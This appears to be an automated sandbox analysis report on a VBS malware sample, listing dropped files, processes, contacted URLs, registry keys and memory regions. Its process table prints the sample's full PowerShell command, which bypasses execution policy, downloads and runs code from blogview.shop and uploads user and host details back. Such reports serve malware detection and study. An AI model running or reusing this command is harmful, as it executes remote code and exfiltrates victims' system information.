Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sAKF0egIZ5.vbs
|
ASCII text, with very long lines (836), with CRLF, LF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ce5czcm.1zx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzcw4r15.alb.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sAKF0egIZ5.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random
-min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://blogview.shop/api/values/38303529143438199171/refresh199/'+$rc);if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('https://blogview.shop/api/values/refresh199',$drpy);}
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://blogview.shop/api/values/refresh199
|
unknown
|
|
|
|
https://blogview.shop/api/values/38303529143438199171/refresh199/
|
unknown
|
|
|
|
https://blogview.shop/api/values/
|
unknown
|
|
|
|
https://blogview.shop
|
unknown
|
|
|
|
https://blogview.shop/api/values/38303529143438199171/refresh199/9076518342.txt
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 6 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blogview.shop
|
unknown
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2959CEB5000
|
heap
|
page read and write
|
|
|
|
25CA1C71000
|
trusted library allocation
|
page read and write
|
|
|
|
2959CC94000
|
heap
|
page read and write
|
|
|
|
2959CC19000
|
heap
|
page read and write
|
|
|
|
25CA02D6000
|
heap
|
page read and write
|
|
|
|
2959CC95000
|
heap
|
page read and write
|
|
|
|
25CA369D000
|
trusted library allocation
|
page read and write
|
|
|
|
2959CC88000
|
heap
|
page read and write
|
|
|
|
2959CC88000
|
heap
|
page read and write
|
|
|
|
2959CC46000
|
heap
|
page read and write
|
|
|
|
25CA0250000
|
heap
|
page read and write
|
|
|
|
25CA3342000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3435C000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CA1B80000
|
trusted library allocation
|
page read and write
|
||
|
25CBA0F0000
|
heap
|
page execute and read and write
|
||
|
2959E550000
|
heap
|
page read and write
|
||
|
BB0AB7E000
|
stack
|
page read and write
|
||
|
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
|
25CB1CDC000
|
trusted library allocation
|
page read and write
|
||
|
25CBA4AB000
|
heap
|
page read and write
|
||
|
25CB1C80000
|
trusted library allocation
|
page read and write
|
||
|
2959CC10000
|
heap
|
page read and write
|
||
|
25CB1C71000
|
trusted library allocation
|
page read and write
|
||
|
25CA0350000
|
heap
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342A2000
|
trusted library allocation
|
page read and write
|
||
|
25CBA1A5000
|
heap
|
page read and write
|
||
|
BB0AC7E000
|
stack
|
page read and write
|
||
|
25CA028E000
|
heap
|
page read and write
|
||
|
7FFD34360000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
|
25CBA4E5000
|
heap
|
page read and write
|
||
|
E6671FE000
|
stack
|
page read and write
|
||
|
25CA3376000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342A4000
|
trusted library allocation
|
page read and write
|
||
|
E666FFE000
|
stack
|
page read and write
|
||
|
E666DFF000
|
stack
|
page read and write
|
||
|
7FFD34470000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CBA310000
|
heap
|
page read and write
|
||
|
25CBA205000
|
heap
|
page read and write
|
||
|
25CA0510000
|
heap
|
page read and write
|
||
|
7FFD34350000
|
trusted library allocation
|
page read and write
|
||
|
E6670FE000
|
stack
|
page read and write
|
||
|
25CA1C03000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
|
25CB1E1F000
|
trusted library allocation
|
page read and write
|
||
|
25CA3498000
|
trusted library allocation
|
page read and write
|
||
|
25CA1C60000
|
heap
|
page execute and read and write
|
||
|
BB0B13B000
|
stack
|
page read and write
|
||
|
25CBA490000
|
heap
|
page read and write
|
||
|
25CA0298000
|
heap
|
page read and write
|
||
|
25CB9C79000
|
heap
|
page read and write
|
||
|
BB0A7AE000
|
stack
|
page read and write
|
||
|
2959CCC4000
|
heap
|
page read and write
|
||
|
25CA1BB0000
|
heap
|
page read and write
|
||
|
7FFD342FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CBA4E3000
|
heap
|
page read and write
|
||
|
7FFD342A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CBA0F7000
|
heap
|
page execute and read and write
|
||
|
25CBA4F1000
|
heap
|
page read and write
|
||
|
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
|
25CA1E9D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342C0000
|
trusted library allocation
|
page read and write
|
||
|
25CBA1DE000
|
heap
|
page read and write
|
||
|
BB0B0BF000
|
stack
|
page read and write
|
||
|
7FFD34460000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF4CEDC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CA333C000
|
trusted library allocation
|
page read and write
|
||
|
2959CC70000
|
heap
|
page read and write
|
||
|
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
|
25CBA4A0000
|
heap
|
page read and write
|
||
|
25CA38E3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
|
25CA381E000
|
trusted library allocation
|
page read and write
|
||
|
25CBA4FE000
|
heap
|
page read and write
|
||
|
25CA0220000
|
heap
|
page read and write
|
||
|
BB0A6E3000
|
stack
|
page read and write
|
||
|
7FFD34610000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
|
2959CA90000
|
heap
|
page read and write
|
||
|
2959CEB0000
|
heap
|
page read and write
|
||
|
7FFD344F0000
|
trusted library allocation
|
page read and write
|
||
|
BB0AA7F000
|
stack
|
page read and write
|
||
|
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34386000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CA1B70000
|
heap
|
page read and write
|
||
|
BB0AEFD000
|
stack
|
page read and write
|
||
|
7FFD342B0000
|
trusted library allocation
|
page read and write
|
||
|
25CBA4CC000
|
heap
|
page read and write
|
||
|
7FFD34490000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34440000
|
trusted library allocation
|
page read and write
|
||
|
25CA1CF5000
|
trusted library allocation
|
page read and write
|
||
|
BB0AAFD000
|
stack
|
page read and write
|
||
|
25CA1B30000
|
heap
|
page read and write
|
||
|
25CA0515000
|
heap
|
page read and write
|
||
|
7FFD34482000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344C0000
|
trusted library allocation
|
page read and write
|
||
|
25CA289D000
|
trusted library allocation
|
page read and write
|
||
|
25CBA3F0000
|
heap
|
page execute and read and write
|
||
|
25CBA150000
|
heap
|
page read and write
|
||
|
E6672FB000
|
stack
|
page read and write
|
||
|
25CA0259000
|
heap
|
page read and write
|
||
|
25CA34F9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
|
25CA0140000
|
heap
|
page read and write
|
||
|
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
|
2959CB90000
|
heap
|
page read and write
|
||
|
BB0ABFE000
|
stack
|
page read and write
|
||
|
E6673FF000
|
stack
|
page read and write
|
||
|
7FFD343C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
BB0BB8E000
|
stack
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
|
25CA3557000
|
trusted library allocation
|
page read and write
|
||
|
BB0AFBE000
|
stack
|
page read and write
|
||
|
BB0ACFE000
|
stack
|
page read and write
|
||
|
E666CFF000
|
stack
|
page read and write
|
||
|
25CA1BC0000
|
heap
|
page readonly
|
||
|
7FFD342AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
25CA1B76000
|
heap
|
page read and write
|
||
|
25CA0345000
|
heap
|
page read and write
|
||
|
BB0BB0E000
|
stack
|
page read and write
|
||
|
25CA029A000
|
heap
|
page read and write
|
||
|
E6668FA000
|
stack
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
|
25CBA1A7000
|
heap
|
page read and write
|
||
|
25CBA2F0000
|
heap
|
page read and write
|
||
|
2959CC71000
|
heap
|
page read and write
|
||
|
25CA029E000
|
heap
|
page read and write
|
||
|
25CA1BA0000
|
trusted library allocation
|
page read and write
|
||
|
25CBA4E8000
|
heap
|
page read and write
|
||
|
BB0AD7E000
|
stack
|
page read and write
|
||
|
25CA1C00000
|
trusted library allocation
|
page read and write
|
||
|
E6669FE000
|
stack
|
page read and write
|
||
|
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34451000
|
trusted library allocation
|
page read and write
|
||
|
25CBA4B8000
|
heap
|
page read and write
|
||
|
BB0A76D000
|
stack
|
page read and write
|
||
|
25CA3266000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3445A000
|
trusted library allocation
|
page read and write
|
||
|
25CBA1FF000
|
heap
|
page read and write
|
||
|
7FFD345A0000
|
trusted library allocation
|
page read and write
|
||
|
25CA02AE000
|
heap
|
page read and write
|
||
|
25CA1C40000
|
trusted library allocation
|
page read and write
|
||
|
25CA026F000
|
heap
|
page read and write
|
||
|
E666AFE000
|
stack
|
page read and write
|
||
|
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
|
25CA38E7000
|
trusted library allocation
|
page read and write
|
||
|
2959CB70000
|
heap
|
page read and write
|
||
|
BB0B03E000
|
stack
|
page read and write
|
||
|
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34356000
|
trusted library allocation
|
page read and write
|
||
|
BB0AE7E000
|
stack
|
page read and write
|
||
|
BB0ADFE000
|
stack
|
page read and write
|
||
|
7FFD344B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34600000
|
trusted library allocation
|
page read and write
|
||
|
25CA36A7000
|
trusted library allocation
|
page read and write
|
There are 149 hidden memdumps, click here to show them.